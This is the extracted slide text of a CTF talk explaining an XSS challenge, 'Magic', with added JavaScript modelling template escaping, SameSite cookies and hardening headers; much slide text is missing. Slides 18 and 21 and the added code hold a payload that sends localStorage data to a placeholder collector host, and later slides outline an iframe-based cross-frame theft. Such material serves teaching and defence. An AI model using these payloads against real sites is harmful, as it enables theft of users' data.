Web Security Learned Through "Magic" - SECCON Beginners Live 2021
by Hi120ki
Slide 1: Magic (Web) - SECCON Beginners Live 2021 - hi120ki
Slide 2: @hi120ki; CTF team: Wani Hackase; Web / Reversing (2); 2021: Reversing: firmware, Web: json, magic
Slide 3: Web: Magic
Slide 4: Magic [Web, Hard]: 31 solves; Web 5 • •
Slide 5: (no text recovered)
Slide 6: (no text recovered)
Slide 7: / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
Slide 8: / URL
Slide 9: (no text recovered)
Slide 10: crawler/index.js: puppeteer, Node.js, Chrome, URL
Slide 11: crawler/index.js: 1. 2. FLAG 3. URL
Slide 12: FLAG; nginx/html/static/index.js; FLAG
Slide 13: FLAG; JavaScript; XSS ( )
Slide 14: XSS: HTML, Web, HTML, JavaScript, Cookie, Web
Slide 15: https://magic.quals.beginners.seccon.jp/ FLAG FLAG
Slide 16: https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG …
Slide 17: FLAG … FLAG https://magic.quals.beginners.seccon.jp/??????????
Slide 18: fetch("https://requestbin.example.com/?f=" + encodeURI(localStorage.getItem("memo"))); FLAG XSS URL
Slide 19: XSS: magic/views/index.ejs
Slide 20: alert(1)
Slide 21: FLAG URL fetch("https://requestbin.example.com/?f=" + encodeURI(localStorage.getItem("memo")));
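The following is an added example, not the challenge's own magic/views/index.ejs and not code from the slides. It models the two ways an EJS template can put a user-controlled "memo" string into the page: raw insertion (`<%- %>`, the XSS case the slides exploit) next to HTML-escaped insertion (`<%= %>`). It also builds the URL that the slide 18/21 payload's fetch() would request and shows what the collector actually receives, because `encodeURI` leaves `#`, `&` and `=` unencoded and so truncates a memo containing `#`. Assumptions: the vulnerable page reflects the memo into the HTML body; `requestbin.example.com` is the slides' placeholder collector; the flag value and the function names (`renderUnescaped`, `renderEscaped`, `exfilUrl`, `receivedMemo`) are this example's own.

```javascript
// Added example (not the challenge's template). Models EJS escaping behaviour
// and the exfiltration URL built by the slides' payload.

// Escape the five characters EJS's <%= %> escapes.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&#34;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => table[c]);
}

// Equivalent of   <div id="memo"><%- memo %></div>   (raw insertion: XSS).
function renderUnescaped(memo) {
  return `<div id="memo">${memo}</div>`;
}

// Equivalent of   <div id="memo"><%= memo %></div>   (escaped: no XSS).
function renderEscaped(memo) {
  return `<div id="memo">${escapeHtml(memo)}</div>`;
}

// Exfiltration payload from the slides, wrapped in a script tag.
const EXFIL_PAYLOAD =
  '<script>fetch("https://requestbin.example.com/?f=" + encodeURI(localStorage.getItem("memo")));</script>';

// Does an executable script tag survive rendering?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Build the URL the payload's fetch() would request for a given memo value.
// encodeURI leaves '#' alone, so a memo containing '#' is cut off at the
// fragment; encodeURIComponent encodes it and keeps the whole value.
function exfilUrl(memo, encoder = "encodeURI") {
  const enc = encoder === "encodeURIComponent" ? encodeURIComponent : encodeURI;
  return "https://requestbin.example.com/?f=" + enc(memo);
}

// What the collector receives: only the 'f' query parameter, which excludes
// everything after an unencoded '#'.
function receivedMemo(url) {
  return new URL(url).searchParams.get("f");
}

// Constructed sample memo; the real one is whatever the crawler stored.
const SAMPLE_MEMO = "ctf4b{dummy#flag}";
console.log(containsScriptTag(renderUnescaped(EXFIL_PAYLOAD)));           // true
console.log(containsScriptTag(renderEscaped(EXFIL_PAYLOAD)));             // false
console.log(receivedMemo(exfilUrl(SAMPLE_MEMO)));                         // ctf4b{dummy
console.log(receivedMemo(exfilUrl(SAMPLE_MEMO, "encodeURIComponent")));   // ctf4b{dummy#flag}
```

Switching the template to the escaped form is the fix on the application side; on the attacker side, `encodeURIComponent` is the encoder to use when the exfiltrated value may contain URL-significant characters.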
Slide 22: FLAG URL
Slide 23: XSS https://magic.quals.beginners.seccon.jp/
Slide 24: … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
Slide 25: ... + = ? XSS
Slide 26: … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL … FLAG
Slide 27: / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
Slide 28: URL
Slide 29: … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ … FLAG XSS
Slide 30: FLAG: 1. FLAG 2. 3.
Slide 31: (no text recovered)
Slide 32: 1. XSS 2. 3.
Slide 33: 1. XSS 2. 3. FLAG
Slide 34: 1. XSS 2. 3.
Slide 35: 1. XSS 2. 3.
Slide 36: FLAG
Slide 37: XSS • • Byte Bandits CTF 2020 Notes App • https://github.com/ByteBandits/bbctf-2020
Slide 38: Byte Bandits CTF 2020 Notes App: https://example.com/login?username= &password= • FLAG iframe • • API
Slide 39: iframe diagram: https://attacker.example.com/ with iframe1 and iframe2 (both https://example.com/); URL, iframe; URL, iframe
Slide 40: iframe diagram: https://attacker.example.com/ with iframe1 and iframe2 (both https://example.com/); iframe 2, iframe
Slide 41: iframe diagram: https://attacker.example.com/ with iframe1 and iframe2 (both https://example.com/); FLAG ... XSS FLAG
Slide 42: iframe diagram: https://attacker.example.com/ with iframe1 and iframe2 (both https://example.com/); FLAG FLAG (top.iframe1.document.body.innerHTML) ...
Slide 43: iframe, SameSite Cookie: None, Lax
Slide 44: https://attacker.example.com/ with iframe1 (https://example.com/); SameSite Cookie=None; iframe, Cookie, Cookie (session=nj49gn...), FLAG
Slide 45: https://attacker.example.com/ with iframe1 (https://example.com/); SameSite Cookie=Lax; iframe, Cookie, Cookie (session=nj49gn...), FLAG
Slide 46: SameSite Cookie=Lax: https://attacker.example.com/ with iframe1 and iframe2 (both https://example.com/); Cookie, Cookie (session=nj49gn...) ✕ FLAG ...
Slide 47: SameSite Cookie=None, iframe, CTF
Slide 48: Cookie: SameSite, HttpOnly, Secure...; Content-Security-Policy; X-Frame-Options ... (XSS: Content-Security-Policy)
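The following is an added example, not code from the slides or from the Notes App challenge. It serves the iframe/SameSite slides (43 to 47) and the hardening slide (48) together: it models the browser's decision on whether the victim's session cookie is attached when https://example.com/ is loaded inside an iframe on https://attacker.example.com/ (sent for SameSite=None, withheld for SameSite=Lax because an iframe load is not a top-level navigation), and it builds the response headers slide 48 lists. Assumptions: `parseSetCookie`, `shouldSendCookie`, `iframeAttackGetsSession` and `hardenedHeaders` are this example's own names; a missing SameSite attribute is treated as Lax (Chrome's default); the cookie value `abc` is constructed.

```javascript
// Added example (not from the slides). Models the SameSite cookie decision
// behind the two-iframe attack and builds hardened response headers.

// Parse one Set-Cookie header into the attributes that matter here. A missing
// SameSite attribute is treated as Lax (Chrome's default since 2020; Chrome's
// short "Lax-allowing-unsafe" POST exception is not modelled).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    secure: false,
    httpOnly: false,
    sameSite: "Lax",
  };
  for (const attr of attrs) {
    const [k, v = ""] = attr.split("=");
    const key = k.trim().toLowerCase();
    if (key === "secure") cookie.secure = true;
    else if (key === "httponly") cookie.httpOnly = true;
    else if (key === "samesite") {
      const val = v.trim().toLowerCase();
      cookie.sameSite = val === "none" ? "None" : val === "strict" ? "Strict" : "Lax";
    }
  }
  return cookie;
}

// Would the browser attach this cookie to the request?
//  - Secure cookies travel only over HTTPS
//  - same-site requests always carry the cookie
//  - SameSite=None is honoured cross-site only when the cookie is also Secure
//    (browsers reject None without Secure)
//  - SameSite=Lax is sent cross-site only on top-level navigations with a
//    safe method; an <iframe> load is a subresource, so Lax cookies stay home
//  - SameSite=Strict is never sent cross-site
function shouldSendCookie(cookie, req) {
  if (cookie.secure && !req.https) return false;
  if (!req.crossSite) return true;
  switch (cookie.sameSite) {
    case "None":
      return cookie.secure;
    case "Lax":
      return req.topLevel && (req.method === "GET" || req.method === "HEAD");
    default:
      return false;
  }
}

// Two cross-site requests originating from the attacker's page.
const IFRAME_LOAD = { crossSite: true, topLevel: false, method: "GET", https: true };
const TOP_LEVEL_LINK = { crossSite: true, topLevel: true, method: "GET", https: true };

// Slides 44-46: does the iframe on attacker.example.com carry the victim's session?
function iframeAttackGetsSession(setCookieHeader) {
  return shouldSendCookie(parseSetCookie(setCookieHeader), IFRAME_LOAD);
}

// Slide 48's hardening as response headers: a session cookie that is HttpOnly
// (unreadable from XSS), Secure and SameSite=Lax (not sent to the attacker's
// iframe), a CSP that restricts script sources and forbids framing, and
// X-Frame-Options for browsers that ignore frame-ancestors.
function hardenedHeaders(sessionValue) {
  return {
    "Set-Cookie": `session=${sessionValue}; Path=/; HttpOnly; Secure; SameSite=Lax`,
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
  };
}

console.log(iframeAttackGetsSession("session=abc; Secure; SameSite=None")); // true
console.log(iframeAttackGetsSession("session=abc; Secure; SameSite=Lax"));  // false
console.log(hardenedHeaders("abc")["Set-Cookie"]);
```

The Lax setting only removes the cookie from the iframe load; the slide 42 step (iframe2's XSS reading `top.iframe1.document.body.innerHTML`) still works whenever both frames are same-origin, which is why frame-ancestors / X-Frame-Options and fixing the XSS itself belong on the same list.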
Slide 49: FLAG +
Slide 50: Magic: https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files; icons: Freepik from Flaticon, https://www.flaticon.com/free-icon/hacker_924874, https://www.flaticon.com/free-icon/programmer_560216, https://www.flaticon.com/free-icon/flag_473724; writeup: https://hi120ki.github.io/blog/posts/20210523-3/